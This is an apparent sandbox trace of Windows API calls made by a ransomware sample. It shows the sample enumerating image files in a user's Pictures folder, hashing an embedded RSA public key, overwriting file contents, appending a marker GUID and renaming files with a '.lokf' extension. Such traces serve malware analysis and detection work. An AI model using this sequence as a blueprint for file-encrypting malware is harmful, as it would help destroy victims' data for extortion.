[0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b520 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4f0 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4f0 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4f0 | out: hHeap=0x660000) returned 1 [0059.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b520 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b508 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4d8 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4c0 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83460 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.201] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x18d2c, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x18d2c, lpOverlapped=0x0) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.201] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18d31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.201] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.202] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.202] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.202] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.202] CloseHandle (hObject=0x5cc) returned 1 [0059.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.203] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OkL4HKnkSYSJIwPNsR_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\okl4hknksysjiwpnsr_.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OkL4HKnkSYSJIwPNsR_.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\okl4hknksysjiwpnsr_.png.lokf")) returned 1 [0059.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.204] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.205] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0xf393b510, ftLastAccessTime.dwHighDateTime=0x1d4d0a2, ftLastWriteTime.dwLowDateTime=0xf393b510, ftLastWriteTime.dwHighDateTime=0x1d4d0a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pt3T5YLjsfWTS8bTn", cAlternateFileName="PT3T5Y~1")) returned 1 [0059.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.205] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ca7a240, ftCreationTime.dwHighDateTime=0x1d4ce0d, ftLastAccessTime.dwLowDateTime=0x539880a0, ftLastAccessTime.dwHighDateTime=0x1d4d2f9, ftLastWriteTime.dwLowDateTime=0x539880a0, ftLastWriteTime.dwHighDateTime=0x1d4d2f9, nFileSizeHigh=0x0, nFileSizeLow=0x157ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIK1-BUGPQEVJirKz6N.jpg", cAlternateFileName="RIK1-B~1.JPG")) returned 1 [0059.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.205] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RIK1-BUGPQEVJirKz6N.jpg") returned=".jpg" [0059.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RIK1-BUGPQEVJirKz6N.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rik1-bugpqevjirkz6n.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.205] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=87979) returned 1 [0059.205] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.208] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15785, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.208] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.208] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.208] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x157ab, lpOverlapped=0x0) returned 1 [0059.209] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.209] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.209] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.209] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.210] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.210] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.210] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.210] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.210] GetLastError () returned 0x0 [0059.210] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.210] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.210] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.210] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.210] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x157b0) returned 0x9c83710 [0059.211] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.211] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.211] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x157ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.211] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.212] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.212] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.212] CloseHandle (hObject=0x5cc) returned 1 [0059.213] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RIK1-BUGPQEVJirKz6N.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rik1-bugpqevjirkz6n.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RIK1-BUGPQEVJirKz6N.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rik1-bugpqevjirkz6n.jpg.lokf")) returned 1 [0059.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.213] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.214] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.214] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d70800, ftCreationTime.dwHighDateTime=0x1d4d1f6, ftLastAccessTime.dwLowDateTime=0x8e210db0, ftLastAccessTime.dwHighDateTime=0x1d4c77c, ftLastWriteTime.dwLowDateTime=0x8e210db0, ftLastWriteTime.dwHighDateTime=0x1d4c77c, nFileSizeHigh=0x0, nFileSizeLow=0x67fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rZNT8ree-9bG.bmp", cAlternateFileName="RZNT8R~1.BMP")) returned 1 [0059.214] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rZNT8ree-9bG.bmp") returned=".bmp" [0059.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\rZNT8ree-9bG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rznt8ree-9bg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.214] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=26620) returned 1 [0059.214] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.217] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x67d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.217] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.218] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.218] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x67fc, lpOverlapped=0x0) returned 1 [0059.218] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.218] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.218] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.218] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.219] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.219] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 